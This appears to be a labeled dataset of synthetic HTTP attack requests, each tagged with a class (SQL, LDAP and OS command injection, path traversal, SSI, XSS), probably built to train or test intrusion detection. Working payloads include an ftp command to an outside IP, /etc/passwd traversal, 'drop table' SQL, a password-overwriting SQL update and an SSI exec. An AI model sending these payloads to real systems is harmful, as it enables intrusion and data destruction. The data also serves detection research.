Cookie: 0woooaatga=ntNemtAkti)re]htaccesulin;naqeOmh1ghs=ik?hlocationc:insertnctnEtaad$$
Cookie2: $Version="530"
Date: Mon, 21 Dec 09 21:26:51 CET
ETag: W/"sqokejaIeojg8ZyiB"
Expect: 100-continue
From: uohepreO@9Mntu.biz
If-Modified-Since: Sun, 03 Oct 04 01:05:25 CET
If-Unmodified-Since: Sun, 24 Jun 07 04:07:34 UTC
If-Match: "dCPZlbmt35Dk6528@a"
If-None-Match: "lbTqAHvuE1Uv8WX7LgLZ"
If-Range: Sun, 12 Sep 04 16:59:36 UTC
Max-Forwards: 972
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM YXRlVGVKcnVvNG9SMHJubXloTG1hZEFuZ3RkeWFEZUdldGRlZm0xOG41bW1yb2Ns
Authorization: Digest uri=http://www.atrBt.uk/llTg/lmty/srosiRhd/mteu/4rRzRrnd.swf
Range: -34,965-6
Referer: /rem8tc9t.jsp
TE: chunked;q=0.5,chunked;q=0.9,trailers
Trailer: Via
User-Agent: Mozilla/1.8 (compatible; MSIE 9.3; Open BSD i386; alihe)
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x680
Via: 3.8 40.37.223.23, fenf/3.4 www.v9eom.htm, 0.6 67.70.172.248
Transfer-Encoding: deflate
Upgrade: rcieEo/9.2, esrs/5.8, kEi6/4.8
Warning: 911 www.ejut.htm:36 "cae6hwoklthpbe8t9y" "Wed, 10 Feb 10 10:50:49 GMT"
X-Forwarded-For: 149.177.156.143
X-Serial-Number: 583461727147573660
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40069
Start - Id: 43503
class: OsCommanding
GET /nthttrnaxA40tt3/mti/JmrrsmyeiEtenoiE/9V7k/tbtiao2leyleAtrgaoi.nsf?iIs8me=a6ibllseoao&ksgjtSe=eu&3Dpln=m-4GU&5efPbh9=5a1rR&egsoOr=+z&eelzixegnhnah=a%24&slaiS=275&Eu=tidHagb&epjH=yl4dUuTl&tysnAtrdn=%27++%3Buftp+-g++%2Fhome%2Fvesiniales%2Fnaleontiasel++145.139.254.182++++%2Ftror++++%3B&axyeaieees=38616697&4os24=f2Nsbq HTTP/1.0
Host: www.nWrea8sgah.st:7
Connection: eelAe
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, identity, identity;q=0.3, compress;q=0.5, identity
Accept-Language: eotm-fRe
Cache-Control: max-age=346
Client-ip: 220.97.61.79
Cookie: Pp8noHi7nayle5=9095;0Adot=opun4Meen;tDideuHgL=ttrsmxx43aodmt;5O1uaot=$
Cookie2: $Version="644"
Date: Thu, 01 May 08 12:28:46 UTC
ETag: "1ZIJyiA7qSu4@.@P-w"
Expect: 100-continue
From: entRerd@7ndhcnQeej.be
If-Modified-Since: Mon, 08 Dec 08 16:01:11 GMT
If-Unmodified-Since: Sat, 19 Jul 08 07:18:23 UTC
If-Match: *
If-None-Match: "5jIqrngsvo7.AafNA"
If-Range: *
Max-Forwards: 2005
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bFJvZ25nOmVmVGNx
Authorization: NTLM eW9jZXVpVWU2SzhsYmVuOGV0ZXFha2p2bW90d2xpdGFFZ2FlZQ==
Range: 32-61,4386-85
Referer: http://igrrdxs.fr/wtnnr.aspx
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/0.4 (compatible; Konqueror/4.1; Linux i586; ouieigB; ossvap)
UA-CPU: MIPS
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5281x2497
Via: HTTP/1.2 17.84.251.253, tmn/7.3 www.coaE.jpg:1
Transfer-Encoding: deflate
Upgrade: nRo2i/0.2, uniywa/5.6, g4s/3.9, urxwij/6.4
Warning: 900 www.eenCnh.jpeg "aDmktlcy9embade" 
X-Forwarded-For: 106.96.131.159
X-Serial-Number: 521013041943
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43503
Start - Id: 36350
class: PathTransversal
GET /@PdivEr8tOhttplHGw6L/a2es/eenthuO4vee/538ionitKb/ehagxsc6tiemtor6ox/Vwservices/WEWuGadmin9_v/opavk4Fyx/ha3ftVknrRoabdotp.gif?tszgdwL=877331&AV5gLYBp=uomeatj0tuwj&ea8oe1tdd=695652240&trtdnesu8as=pfeeeww+59script%3E&otyepA7=%5Ctmpjs%26&RzAdl4BOh.R4=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&fDnK_o2TSA8=sNt&nt9rtnuak4=sho&eigoeikhalae=694&Htt=77540&UvbscriptW-7kMVjuq=1&-stdiniU=ciW%40&2iaaCe=retomt+t HTTP/1.1
Host: www.ebava.be
Connection: keep-alive
Accept: application/*;q=0.3, image/png
Accept-Charset: x-mac-ce, euc-jp, windows-1257
Accept-Encoding: *
Accept-Language: Thi-aenoltm, tauu1-tpeyyt43, tfocnowf-ugn;q=0.4
Cache-Control: no-transform
Client-ip: 238.204.79.45
Cookie: hlOtpsaewh7re57=1299271;gWmhUg=242398838;l8e9tehhiyhie=i~hsopt[a0d|ev;dFEQLlLAMk=ebtSntrq;1Z5Sncx23VeQ@=er+;lhqiGTh1r=r%8)ies
Cookie2: $Version="563"
Date: Mon, 07 Aug 06 23:02:50 CET
ETag: "cfqnbPK5k4tKX2_HzErM"
Expect: yIdnea=sctmien
From: sleras@7i3heoin.uk
If-Modified-Since: Tue, 01 Jan 08 10:25:00 UTC
If-Unmodified-Since: Wed, 16 Jul 08 19:04:03 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 5.3
Pragma: Eo7rmatt=owzPeti
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: NTLM YXN0aGM0YTh0aDgzaGlvdG1tNXBwZnJhdG50aDFzc2E=
Range: 75-618834,757-411,77394-267269
Referer: http://www.e4esse.uk/r7ssi/eadh.gif
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/6.5 (compatible; Konqueror/1.6; Open BSD i586; nh4ooer)
UA-CPU: x86
UA-Disp: 7628,9010,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: 1.4 57.185.61.236, FTP/6.4 165.207.236.127, FTP/8.7 118.88.194.64
Transfer-Encoding: gzip
Warning: 201 www.dreo.png "soaIbe7zmO" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36350
Start - Id: 38804
class: LdapInjection
GET /oWAt/Nzsystem.php?0Ti9iiautoexecyc.=a9M+ileYdf&4xk7likeocC=ia%29%28%26%28objectClass+%3D++5cte*%29 HTTP/1.1
Host: 151.248.11.178:80
Connection: dicIiR2u
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9
Accept-Language: ongRrsvl-stenu, tspmte-hdms0hon, nrt-wyhaeeR6;q=0.3, i-d4i;q=0.8, wghadoe-ga
Cache-Control: no-cache
Client-ip: 103.147.207.153
Cookie: sdiarlygarophic=NeT;hOg2ceo4f=anm2oio;otIb5mtu= dbgsoundft;tm3dscc=i6tm3sxo;ata=qs
Cookie2: $Version="055"
Date: Wed, 26 Mar 08 20:45:13 GMT
ETag: "954BYt15GW0-QKluibg"
Expect: stgenha=alean
From: yRoml@orAqOa.ch
If-Modified-Since: Sat, 28 Jul 07 02:57:46 GMT
If-Unmodified-Since: Thu, 11 Mar 04 20:22:53 GMT
If-Match: *
If-None-Match: "ysKomA0DHbx6d0WQ"
If-Range: Mon, 30 Jul 07 08:42:50 CET
Max-Forwards: 8
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM RW1rbmlpc2hoaTFzOUlldHNFZmF4c25ob3RlNm9qbHNjcG43ZQ==
Authorization: Basic b29UcnQ6cG1jdA==
Range: 929605-5,-089,269-624
Referer: http://www.ydxb.cz/emnt/Detlebt/Eragieas/oHbq/0eehylh.asmx
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: TdI2eaiwlsrztc
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8161x590
Via: FTP/3.1 www.tUenorwu.shtml
Transfer-Encoding: deflate
Upgrade: oorig/6.0, osraet/4.0
Warning: 492 17.108.254.89 "nam6dyTtRno" 
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38804
Start - Id: 37873
class: LdapInjection
GET /bFv_xmJiIYcgQHb9yr.mspx?Mfjovnnyarj=ep2t%29%28%26%28objectClass++%3D5oa*%29&CortAwOlosn=etcmtno5&qidn1v=etc%29rlaeareileoe&elhooTGw=oBrNhatu&armituigha=nwN6rNliEzdoye&858zoctUSzz=undc%3Draea%3C&GfKmK4Sh=566981&owrl9g=2aoirlw5 HTTP/1.1
Host: www.eeHcnE25.be
Connection: keep-alive
Accept: text/xml, image/*, video/*;q=0.5
Accept-Charset: windows-1252;q=0.6, ks_c_5601-1987, iso-8859-15, iso-8859-2;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: g-re0;q=0.8, sreyo4-nenoae, ntdoa2Se-s4;q=0.4, i2sae6q-kee;q=0.2
Cache-Control: max-stale=9
Client-ip: 243.107.176.204
Cookie: 6c=78;5b1ngchnekpeos=il:adminy|i8gsee0 insert
Cookie2: $Version="0"
Date: Sat, 14 Oct 06 02:06:42 CET
ETag: W/"pzr-MWT_QI7QEla-I"
Expect: 100-continue
From: dxmog@eeOtwtfr.com
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Thu, 15 Oct 09 05:52:44 CET
If-Match: "dufDhMLYNzKBPICs"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: Fri, 12 Mar 04 05:36:31 CET
Max-Forwards: 1743
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: mHrk sGamdg=QmliIol
Range: 89-,46-035533,8-609
Referer: /fitounI4/qSp5edo/irnefsu/te4oa1.cgi
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.9 (Windows; U; WinNT 8.9; y8-hE; rv:3.2.7) Gecko/92290134
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.1 178.2.110.138:185, 7.6 www.eepQitop.css, 8.4 231.254.118.238
Transfer-Encoding: compress
Upgrade: obsm/5.8, 9ryw/0.8, Scti3/4.8
Warning: 121 www.2yE9crtu.js "o3rtsabl" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 37873
Start - Id: 42364
class: SqlInjection
GET /snmb@IVutmmiseW9qdO/hTeqseeaqsrtn/t4jxVyTIq.f/oNaiS.THxWcx/mYdm6-.png?dl=em+se&N4Bperl8tPstyle=%27++++group++by+++++users.id+having++27%3D27&RwQAUiloga=Si%3C&eootreetg=e60adelete-6To+%3Fsr&to=eKsU&aehfhiln1p=esdomrtdnsystemciE&aiSaU1eanoLmlz2=tsiOatf7rne71 HTTP/1.0
Host: 24.79.182.166:20601
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: lhpOi-8yr6pBi;q=0.2, dbhs-Nllr3;q=0.2, tut-v, 1ed-ieatteu;q=0.8
Cache-Control: only-if-cached
Client-ip: 216.245.152.103
Cookie: st59forbhMywtns=n
Cookie2: $Version="88"
Date: Mon, 23 Aug 04 15:29:56 GMT
ETag: ".pHQcBCpLNiI3Vv"
Expect: yslocn=vUdhtgTh;enre
From: 7Wathoi0@p7np.ch
If-Modified-Since: Sun, 11 Mar 07 12:59:58 GMT
If-Unmodified-Since: Thu, 31 Aug 06 10:02:40 UTC
If-Match: *
If-None-Match: *
If-Range: "J1jbAnYAkRDfR6Jb71fO"
Max-Forwards: 2
MIME-Version: 2.3
Pragma: diScxtij=Eoehkpr
Proxy-Authorization: dlmr slzlneo=pHmge92s
Authorization: NTLM ZWRwZWhhc2Fhbm51aXdxRWVvZWloZXRhZUpxYWVlbnJl
Range: -966,396-333,-3990
Referer: /yC0d/ersoAas/nomiotid.tar.gz
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.2 (Windows; U; Win 9x 0.4; ul-s7; rv:9.5.4) Gecko/09397671
UA-CPU: MIPS
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1680x018
Via: FTP/2.1 www.vohduxn.css
Transfer-Encoding: compress
Upgrade: ioA/2.2, sl6sg/1.0
Warning: 423 132.125.191.161:87 "rdoiorrnoghcct9sL6ci" 
X-Forwarded-For: 173.232.8.193
X-Serial-Number: 71261
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42364
Start - Id: 45169
class: PathTransversal
GET /../../? HTTP/1.1
Host: 149.195.66.234
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 49.63.221.221
Cookie: bsmSo=oansait;V5CTXjwmKNR=wLYfE_d
Cookie2: $Version="70"
Date: Fri, 07 May 04 03:49:25 GMT
ETag: W/"nusweEuleB7R8Ih"
Expect: hness
From: eawnt@ds5lo.de
If-Modified-Since: Tue, 20 Apr 04 11:47:43 UTC
If-Unmodified-Since: Tue, 02 Oct 07 19:20:38 CET
If-Match: *
If-None-Match: "8sRO4g7qg3tp2K28C"
If-Range: "axLjniKNo@mfU5U"
Max-Forwards: 9
MIME-Version: 7.3
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: NTLM ZWFuYWVhc2RzOGFldG1pc2VwZXRkaGVtc3FydGVxaGlhcjVXaG9ldGFIaXRoM2ZD
Range: 551-3881,-846
Referer: /aenrcew.php3
TE: trailers,trailers
Trailer: Date
User-Agent: s0etnhg
UA-CPU: StrongARM
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1177x8327
Via: 4.4 www.atiom.htm
Transfer-Encoding: tlEn5; ceeeeer=geezwhe
Upgrade: iis5w/2.9, 8fLc/3.7, wahe/2.1, ossrxy/5.0
Warning: 731 www.s1twimt.js "shcldhaeymHeqh" "Wed, 16 Mar 05 01:22:20 GMT"
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45169
Start - Id: 42170
class: SqlInjection
GET /azVfKs7_eD-D16/Yxzzl1kr/Ri.nsf?optpasswdXGGZJOM9Z=45793&radeaimtnocasc=235274&osneIrnqesaq=104043162&ipqnxJanoa=7569180&gBst=%27+++%2F**%2F+++++OR++++%2F**%2F%27%27+%3D++%27&kpantseCEnzhy=aBu&t0l7hniega=dE0jdlH&aro=31&ecoorC=d3G&nmuBzcx7u0=yR4.83%40&8dssLoSogda=4296&0ti6hIl=9 HTTP/1.1
Host: 93.112.59.194
Connection: close
Accept: text/plain
Accept-Charset: euc-tw;q=0.7, hz-gb-2312;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 83.24.252.26
Cookie: tg0za=5229;feheel1cb=tf1nGRFQ;hoaGo= ql |oad'niblhi7bgsoundt
Cookie2: $Version="5"
Date: Fri, 06 May 05 06:12:51 CET
ETag: "rmoKgaJRhzxXhz04d"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 21 Apr 08 09:51:44 GMT
If-Unmodified-Since: Mon, 23 Jun 08 07:34:32 UTC
If-Match: "yZjPYsdxkZX2ETBc"
If-None-Match: "DdeM9ivtY.IaukRz6"
If-Range: Wed, 23 Mar 05 22:21:25 GMT
Max-Forwards: 0
MIME-Version: 5.9
Pragma: 7dris=ohfYtam
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: EfkCa saIty=r0olytq
Range: -65233,-6365
Referer: http://fryiqh.net/ltttcdg/fift.html
TE: trailers
Trailer: Range
User-Agent: rh1UNbBHn http://www.QrhSadag.gov
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/9.3 114.145.212.175, 7.9 153.253.174.161:86
Transfer-Encoding: gzip
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42170
Start - Id: 40229
class: SSI
POST /Lli/btlzhdh7jee/clm70oohxihAR7tibone/aeteau6otssL5dt/tZcfuyej.php4? HTTP/1.1
Content-Length: 134
Content-Language: hc,eeen
Content-Encoding: gzip
Content-Location: /avlmedEs/mntxnmnj/hL6ult.tar
Content-MD5: MXBzbWVvd3FlTmJzT29zMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 May 09 02:32:56 UTC
Last-Modified: Mon, 29 Mar 10 20:23:34 GMT
Host: 166.100.254.58
Connection: close
Accept-Charset: *
Accept-Language: imeei-qriesey, rrtawN-1ut, s-fr
Cache-Control: only-if-cached
Cookie: Zezgnity=<!-- #exec  cmd="/bin/ls    -l   /home/ctl/dhtosirx"  -->;la=ttAo;KfEvmPSH=fdT5wL;al1j=5135938;HbmsnE=~ lq$oge nhntC ju
Date: Thu, 24 Jun 04 08:27:43 CET
ETag: W/"IUtB66tYQN0c-MVgG"
If-Modified-Since: Fri, 28 Jan 05 05:11:10 CET
If-Match: *
If-None-Match: "5xQlHirTsW_8D4MXEa"
Max-Forwards: 60
Pragma: sDu='j'
Referer: http://www.acnit.it/jmsnrTtu/oUg1p/tnauia.sh
TE: trailers,trailers
User-Agent: uoberck (nK-Bbz; lJhUK8_H6b; nPOJiR; pxiJttfHH9)
Via: 5.7 251.62.151.170
Transfer-Encoding: deflate

Qosexodn=gesrm&ezrxe=tnwr&Ye2oe=rgBchu&ttinol1soob9=787&pH=aebdusk\iswhereht&lhnm=etcoOtnxaatinbn&foebu5=6teohga3o&os8cHobzlcBuset=2

End - Id: 40229
Start - Id: 41706
class: SqlInjection
GET /rchOnsmtHpI/ttwefmionvh8zti9kPu/tuobigs/rs6HB/yUemg5vK5My-0-L.css?ms4i47enncaS=3792841165&ndsclivtro5Ej=cF5Y&amfBarecuel=%3Balter+table++++riliiens++set+password+%3D++++%27Isyty%27++where++++name+%3D+%27sedie%27%3B&b4vCmnZ=aid HTTP/1.1
Host: 161.20.44.92
Connection: Vnru
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: p-eohiervt, ahpzn3so-w, fmti-qb
Cache-Control: max-age=07
Client-ip: 173.191.187.99
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Wed, 17 Mar 04 24:46:26 UTC
ETag: W/"n.kuSNHdWwh7jG28iD8T"
Expect: Aegwua7=keneAcmn;torumEet=iitsHovu
From: nrnG@tfeie8.biz
If-Modified-Since: Fri, 12 Nov 04 18:05:05 GMT
If-Unmodified-Since: Fri, 22 Jul 05 20:23:29 GMT
If-Match: "Fu6sD-vyicb6u9b2"
If-None-Match: "qFgmRnpRNUk82_NNw@h"
If-Range: Fri, 27 May 05 17:51:41 CET
Max-Forwards: 36
MIME-Version: 5.8
Pragma: rhl0rs='t'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=aiHhuNEi
Range: 864538-4,42725-309719
Referer: /eFnjjete/icitTti/edTbi6as/hnu7/rXdydrH.msf
TE: trailers,gzip,chunked
Trailer: Trailer
User-Agent: Hz4dp (jnW3DMiq; szp-wDZ)
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 128x875
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: Him/6.1, srtana/5.1, 5si/1.9, fHrl2k/2.1
Warning: 196 174.84.69.81 "ewttXoTtla" 
X-Forwarded-For: 93.102.101.223
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41706
Start - Id: 48067
class: XSS
GET /eq/dDYqZmeVLO8S.w@l/lp9a/egHTbmF-.html?7iTegxhtsor3lm=%3Clink++rel+%3D++++%22+++++stylesheet+++++%22+href+++%3D++++%22++++javascript%3A%5Balert++++%28%276oyn%27%29%3B%5D+++++%22+++%3E HTTP/1.1
Host: www.ewHdruerhj.org
Connection: close
Accept: */*;q=0.7
Accept-Charset: koi8-r;q=0.5, koi8-r;q=0.3, isiri-3342, gb2312;q=0.0
Accept-Encoding: identity, identity
Accept-Language: *;q=0.4
Cache-Control: euttEgn='Esei'
Client-ip: 185.80.82.48
Cookie: gt3iscccohs=81;s0a6fGMlF=nddHp;litod21eio9=heornonbhtr;weyloge3soSldab=fld;aioor=645929174;truoqnhliIipo=osai8z
Cookie2: $Version="6"
Date: Fri, 02 Jun 06 09:24:35 GMT
ETag: W/"Z8MIfduBhPta2zhbD0ct"
Expect: 100-continue
From: 8en5b@ucyi.ch
If-Modified-Since: Sat, 22 Mar 08 05:12:10 CET
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: *
If-None-Match: "58aXOt00b_TIZp@0Ps"
If-Range: Sat, 29 Apr 06 01:35:02 CET
Max-Forwards: 4314
MIME-Version: 5.2
Pragma: aXmta5mR='h0'
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=MD5-sess
Range: 576-842445,767371-238800,-653364
Referer: http://uzltfB2.uk/ongt/iofka.avi
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.0 (Machintosh; U; Mac OS X 9.6; en-Bn; rv:8.6.9) Gecko/17566642
UA-CPU: x86
UA-Disp: 4437,742,16
UA-Pixels: 6001x2247
Via: lraqen/1.8 73.105.93.130
Transfer-Encoding: identity
Upgrade: wAre6i/8.0, kmnmln/4.1, u2nAT/4.0
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 69.186.228.89
~~~~~: ~~~~~~~~~~

null

End - Id: 48067
Start - Id: 36223
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: 44.192.72.78
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: euc-cn;q=0.0, euc-kr
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-age=125
Client-ip: 253.92.235.246
Cookie: Yiaibgtu6fwi=108666;3RYatd=jqA
Cookie2: $Version="659"
Date: Tue, 19 Sep 06 20:48:16 CET
ETag: W/"3f1XJysaM8JKnKP718"
Expect: b5ooxi=dd0uA
From: tictooes@rEbaola.net
If-Modified-Since: Mon, 21 Feb 05 05:42:28 CET
If-Unmodified-Since: Wed, 03 Dec 08 10:02:56 GMT
If-Match: "1KXMluEUxlWYaRsWHPP"
If-None-Match: "L5ApjO1QIDT3CZbXXwz"
If-Range: "G8UZdAebuuG3M_5-"
Max-Forwards: 516
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM YWVjZTlzYU45cmVub3RwVGVldGJpZ3RvdGw0ZXRsZkVja21zYnRuamk=
Range: 183-
Referer: http://www.z3tnse.cz/nsle/f4eda.tiff
TE: deflate,chunked;q=0.3
Trailer: Accept-Language
User-Agent: ailo9rrjse/6.5.2.7.9
UA-CPU: MIPS
UA-Disp: 399,5892,8
UA-OS: Win98
Via: HTTP/5.2 www.eri0ib8.css:8671, HTTP/5.1 www.aneebj.shtml, HTTP/7.0 www.Abtrtn.html
Transfer-Encoding: wco0ln; tmumx=othb
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Forwarded-For: 190.138.69.239
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36223
Start - Id: 46518
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.1
Host: 205.227.196.222
Connection: shney
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: o='neha'
Client-ip: 44.240.178.88
Cookie: rtn9wiyuark=ehl~?weweallaeallalk&L;b;roOr=gimcnzso3rax;a1tc=nf9-Jt.e3Iy;N6xNeursEr=aVueu;hge9issNrn=inhe9ocrg
Cookie2: $Version="1"
Date: Sat, 04 Mar 06 21:18:46 UTC
ETag: "aNVJT2lKpqFCO9DMA"
Expect: 8enk=l68tr
From: eHTlcetd@ogsi0oerkl.biz
If-Modified-Since: Sun, 13 Nov 05 12:15:35 GMT
If-Unmodified-Since: Thu, 22 Sep 05 02:18:48 CET
If-Match: "sxa9XaWF5oOcwQJ3FF@h"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: Wed, 16 Jul 08 23:46:15 UTC
Max-Forwards: 7600
MIME-Version: 0.6
Pragma: S='ionaepTS'
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: /1wrt/mrta/elrsEl.jpeg
TE: chunked;q=0.5,gzip
Trailer: Pragma
User-Agent: 5t7r/5.9.2
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 139x000
Via: HTTP/5.6 186.35.189.146, 4eg3/3.9 77.123.53.205:9864
Transfer-Encoding: gzip
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 496 54.104.249.69 "iplf" "Fri, 06 May 05 07:10:25 GMT"
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46518
Start - Id: 38097
class: LdapInjection
GET /insertJErVp38bmochaEI5/welncTn0/eotftepT/r0YtoO/hi7R./ogshei/skiXL/nrnvl2w/iD1mw_lL/rcVkNTpyWWv.jpg?slrns1fiocrs9o=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: 14.42.236.139
Connection: keep-alive
Accept: audio/basic;q=0.6, application/*
Accept-Charset: iso-10646-ucs-2;q=0.8, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 209.94.206.107
Cookie: 3yy8=- c
Cookie2: $Version="433"
Date: Wed, 03 Dec 08 18:28:46 UTC
ETag: ".@oOa6lHm-n1XKovek"
Expect: yzytf=wi36hMoe
From: ehldyeiL@ertsuha.st
If-Modified-Since: Mon, 19 Oct 09 13:18:13 GMT
If-Unmodified-Since: Sat, 03 Feb 07 07:20:13 UTC
If-Match: *
If-None-Match: "7uUEgZHOE@Xa-@h6r"
If-Range: *
Max-Forwards: 803
MIME-Version: 9.4
Pragma: Tcj=rt
Proxy-Authorization: atswre uFty=o9ssf
Authorization: Basic YWVBaXVFOnNsZWxyMw==
Range: 943633-,-798,-667
Referer: http://r9sahe3a.fr/seeiall/gfin3ena/cnnplnf.pdf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.2 (Windows; U; WinNT 4.6; lN-ce; rv:8.2.7) Gecko/66372406
UA-CPU: 68000
UA-Disp: 6214,984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3700x2595
Via: 6.8 177.60.252.111, 4.2 www.arrzt.css:8512, 5.0 241.22.114.3:419
Transfer-Encoding: deflate
Upgrade: ttyt/8.2, cspny/5.6, dpX8/2.9
Warning: 611 99.132.169.142 "aehcm" 
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 2885123328233620
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38097
Start - Id: 41626
class: SqlInjection
GET /cbtths30mccnjoecst/uS88hddqm/gbtecgdiaaasnqeo6tEq/RetcgmYIl./yTrenaamleepdcN7oaip/hmsaYtoh3j/dQnydT/o0eknt4akeaa.exe?oVh0=VefIuopto&hhslNoiNe8mlh9=8&tisree=cpk&nBnyAc37at=%27%3B+++drop+++table++++pgsdtsaevse&ks9sut=592&ufiLolztooa=hZrsjA48J&oTgW=t%28ts&bYxituon=efxterm2d%3Aranmdyd%26pt&EORqyaUOB3cat.=6832&sq3remp=onnu HTTP/1.0
Host: www.0lu5aaPdr.ch
Connection: aNcw
Accept: */*
Accept-Charset: x-mac-ce;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 166.71.235.134
Cookie: malee=fprl;fHaMopmhSe= iascate tbetweenti;e+;yeosh=471;iosasEyRawtte=Rgroup by;7centmlpintaNS=ySc(l
Cookie2: $Version="003"
Date: Fri, 05 Dec 08 17:51:33 CET
